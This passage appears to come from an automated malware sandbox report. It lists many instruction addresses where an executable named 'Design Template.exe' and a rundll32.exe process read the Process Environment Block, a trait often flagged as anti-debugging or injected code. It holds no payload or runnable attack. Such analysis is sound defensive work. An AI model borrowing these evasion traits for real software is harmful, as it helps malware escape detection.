Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A27D50 mov eax, dword ptr fs:[00000030h] 4_2_00A27D50
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h] 4_2_00AD0EA5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h] 4_2_00AD0EA5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h] 4_2_00AD0EA5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A846A7 mov eax, dword ptr fs:[00000030h] 4_2_00A846A7
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9FE87 mov eax, dword ptr fs:[00000030h] 4_2_00A9FE87
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A316E0 mov ecx, dword ptr fs:[00000030h] 4_2_00A316E0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A176E2 mov eax, dword ptr fs:[00000030h] 4_2_00A176E2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A48EC7 mov eax, dword ptr fs:[00000030h] 4_2_00A48EC7
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ABFEC0 mov eax, dword ptr fs:[00000030h] 4_2_00ABFEC0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A336CC mov eax, dword ptr fs:[00000030h] 4_2_00A336CC
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8ED6 mov eax, dword ptr fs:[00000030h] 4_2_00AD8ED6
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0E620 mov eax, dword ptr fs:[00000030h] 4_2_00A0E620
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ABFE3F mov eax, dword ptr fs:[00000030h] 4_2_00ABFE3F
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h] 4_2_00A0C600
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h] 4_2_00A0C600
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h] 4_2_00A0C600
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A38E00 mov eax, dword ptr fs:[00000030h] 4_2_00A38E00
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1608 mov eax, dword ptr fs:[00000030h] 4_2_00AC1608
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3A61C mov eax, dword ptr fs:[00000030h] 4_2_00A3A61C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3A61C mov eax, dword ptr fs:[00000030h] 4_2_00A3A61C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1766D mov eax, dword ptr fs:[00000030h] 4_2_00A1766D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 4_2_00A2AE73
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 4_2_00A2AE73
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 4_2_00A2AE73
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 4_2_00A2AE73
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 4_2_00A2AE73
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h] 4_2_00A17E41
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h] 4_2_00A17E41
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h] 4_2_00A17E41
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h] 4_2_00A17E41
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h] 4_2_00A17E41
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h] 4_2_00A17E41
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACAE44 mov eax, dword ptr fs:[00000030h] 4_2_00ACAE44
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACAE44 mov eax, dword ptr fs:[00000030h] 4_2_00ACAE44
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A18794 mov eax, dword ptr fs:[00000030h] 4_2_00A18794
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h] 4_2_00A87794
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h] 4_2_00A87794
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h] 4_2_00A87794
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A437F5 mov eax, dword ptr fs:[00000030h] 4_2_00A437F5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A04F2E mov eax, dword ptr fs:[00000030h] 4_2_00A04F2E
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A04F2E mov eax, dword ptr fs:[00000030h] 4_2_00A04F2E
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3E730 mov eax, dword ptr fs:[00000030h] 4_2_00A3E730
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD070D mov eax, dword ptr fs:[00000030h] 4_2_00AD070D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD070D mov eax, dword ptr fs:[00000030h] 4_2_00AD070D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3A70E mov eax, dword ptr fs:[00000030h] 4_2_00A3A70E
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3A70E mov eax, dword ptr fs:[00000030h] 4_2_00A3A70E
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2F716 mov eax, dword ptr fs:[00000030h] 4_2_00A2F716
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9FF10 mov eax, dword ptr fs:[00000030h] 4_2_00A9FF10
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9FF10 mov eax, dword ptr fs:[00000030h] 4_2_00A9FF10
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1FF60 mov eax, dword ptr fs:[00000030h] 4_2_00A1FF60
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8F6A mov eax, dword ptr fs:[00000030h] 4_2_00AD8F6A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1EF40 mov eax, dword ptr fs:[00000030h] 4_2_00A1EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA44B mov eax, dword ptr fs:[00000030h] 14_2_044BA44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451C450 mov eax, dword ptr fs:[00000030h] 14_2_0451C450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451C450 mov eax, dword ptr fs:[00000030h] 14_2_0451C450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A746D mov eax, dword ptr fs:[00000030h] 14_2_044A746D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0455740D mov eax, dword ptr fs:[00000030h] 14_2_0455740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0455740D mov eax, dword ptr fs:[00000030h] 14_2_0455740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0455740D mov eax, dword ptr fs:[00000030h] 14_2_0455740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h] 14_2_04506C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h] 14_2_04506C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h] 14_2_04506C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h] 14_2_04506C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BBC2C mov eax, dword ptr fs:[00000030h] 14_2_044BBC2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04558CD6 mov eax, dword ptr fs:[00000030h] 14_2_04558CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h] 14_2_04506CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h] 14_2_04506CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h] 14_2_04506CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045414FB mov eax, dword ptr fs:[00000030h] 14_2_045414FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449849B mov eax, dword ptr fs:[00000030h] 14_2_0449849B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C3D43 mov eax, dword ptr fs:[00000030h] 14_2_044C3D43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04503540 mov eax, dword ptr fs:[00000030h] 14_2_04503540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A7D50 mov eax, dword ptr fs:[00000030h] 14_2_044A7D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AC577 mov eax, dword ptr fs:[00000030h] 14_2_044AC577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AC577 mov eax, dword ptr fs:[00000030h] 14_2_044AC577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04558D34 mov eax, dword ptr fs:[00000030h] 14_2_04558D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0450A537 mov eax, dword ptr fs:[00000030h] 14_2_0450A537
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454E539 mov eax, dword ptr fs:[00000030h] 14_2_0454E539
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h] 14_2_044B4D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h] 14_2_044B4D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h] 14_2_044B4D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448AD30 mov eax, dword ptr fs:[00000030h] 14_2_0448AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov ecx, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04538DF1 mov eax, dword ptr fs:[00000030h] 14_2_04538DF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0449D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0449D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0454FDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0454FDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0454FDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0454FDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h] 14_2_04482D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h] 14_2_04482D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h] 14_2_04482D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h] 14_2_04482D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h] 14_2_04482D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h] 14_2_044B2581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h] 14_2_044B2581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h] 14_2_044B2581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h] 14_2_044B2581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BFD9B mov eax, dword ptr fs:[00000030h] 14_2_044BFD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BFD9B mov eax, dword ptr fs:[00000030h] 14_2_044BFD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B35A1 mov eax, dword ptr fs:[00000030h] 14_2_044B35A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045505AC mov eax, dword ptr fs:[00000030h] 14_2_045505AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045505AC mov eax, dword ptr fs:[00000030h] 14_2_045505AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h] 14_2_044B1DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h] 14_2_044B1DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h] 14_2_044B1DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454AE44 mov eax, dword ptr fs:[00000030h] 14_2_0454AE44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454AE44 mov eax, dword ptr fs:[00000030h] 14_2_0454AE44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449766D mov eax, dword ptr fs:[00000030h] 14_2_0449766D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h] 14_2_044AAE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h] 14_2_044AAE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h] 14_2_044AAE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h] 14_2_044AAE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h] 14_2_044AAE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h] 14_2_0448C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h] 14_2_0448C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h] 14_2_0448C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B8E00 mov eax, dword ptr fs:[00000030h] 14_2_044B8E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA61C mov eax, dword ptr fs:[00000030h] 14_2_044BA61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA61C mov eax, dword ptr fs:[00000030h] 14_2_044BA61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541608 mov eax, dword ptr fs:[00000030h] 14_2_04541608
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448E620 mov eax, dword ptr fs:[00000030h] 14_2_0448E620
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0453FE3F mov eax, dword ptr fs:[00000030h] 14_2_0453FE3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04558ED6 mov eax, dword ptr fs:[00000030h] 14_2_04558ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B36CC mov eax, dword ptr fs:[00000030h] 14_2_044B36CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C8EC7 mov eax, dword ptr fs:[00000030h] 14_2_044C8EC7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0453FEC0 mov eax, dword ptr fs:[00000030h] 14_2_0453FEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B16E0 mov ecx, dword ptr fs:[00000030h] 14_2_044B16E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044976E2 mov eax, dword ptr fs:[00000030h] 14_2_044976E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451FE87 mov eax, dword ptr fs:[00000030h] 14_2_0451FE87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h] 14_2_04550EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h] 14_2_04550EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h] 14_2_04550EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045046A7 mov eax, dword ptr fs:[00000030h] 14_2_045046A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449EF40 mov eax, dword ptr fs:[00000030h] 14_2_0449EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449FF60 mov eax, dword ptr fs:[00000030h] 14_2_0449FF60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04558F6A mov eax, dword ptr fs:[00000030h] 14_2_04558F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451FF10 mov eax, dword ptr fs:[00000030h] 14_2_0451FF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451FF10 mov eax, dword ptr fs:[00000030h] 14_2_0451FF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA70E mov eax, dword ptr fs:[00000030h] 14_2_044BA70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA70E mov eax, dword ptr fs:[00000030h] 14_2_044BA70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0455070D mov eax, dword ptr fs:[00000030h] 14_2_0455070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0455070D mov eax, dword ptr fs:[00000030h] 14_2_0455070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AF716 mov eax, dword ptr fs:[00000030h] 14_2_044AF716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04484F2E mov eax, dword ptr fs:[00000030h] 14_2_04484F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04484F2E mov eax, dword ptr fs:[00000030h] 14_2_04484F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BE730 mov eax, dword ptr fs:[00000030h] 14_2_044BE730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C37F5 mov eax, dword ptr fs:[00000030h] 14_2_044C37F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507794 mov eax, dword ptr fs:[00000030h] 14_2_04507794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507794 mov eax, dword ptr fs:[00000030h] 14_2_04507794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507794 mov eax, dword ptr fs:[00000030h] 14_2_04507794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04498794 mov eax, dword ptr fs:[00000030h] 14_2_04498794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A0050 mov eax, dword ptr fs:[00000030h] 14_2_044A0050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A0050 mov eax, dword ptr fs:[00000030h] 14_2_044A0050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04551074 mov eax, dword ptr fs:[00000030h] 14_2_04551074
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04542073 mov eax, dword ptr fs:[00000030h] 14_2_04542073
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04554015 mov eax, dword ptr fs:[00000030h] 14_2_04554015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04554015 mov eax, dword ptr fs:[00000030h] 14_2_04554015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507016 mov eax, dword ptr fs:[00000030h] 14_2_04507016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507016 mov eax, dword ptr fs:[00000030h] 14_2_04507016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507016 mov eax, dword ptr fs:[00000030h] 14_2_04507016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h] 14_2_0449B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h] 14_2_0449B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h] 14_2_0449B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h] 14_2_0449B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B002D mov eax, dword ptr fs:[00000030h] 14_2_044B002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B002D mov eax, dword ptr fs:[00000030h] 14_2_044B002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B002D mov eax, dword ptr fs:[00000030h] 14_2_044B002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B002D mov eax, dword ptr fs:[00000030h] 14_2_044B002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B002D mov eax, dword ptr fs:[00000030h] 14_2_044B002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov ecx, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044858EC mov eax, dword ptr fs:[00000030h] 14_2_044858EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489080 mov eax, dword ptr fs:[00000030h] 14_2_04489080
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04503884 mov eax, dword ptr fs:[00000030h] 14_2_04503884
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04503884 mov eax, dword ptr fs:[00000030h] 14_2_04503884
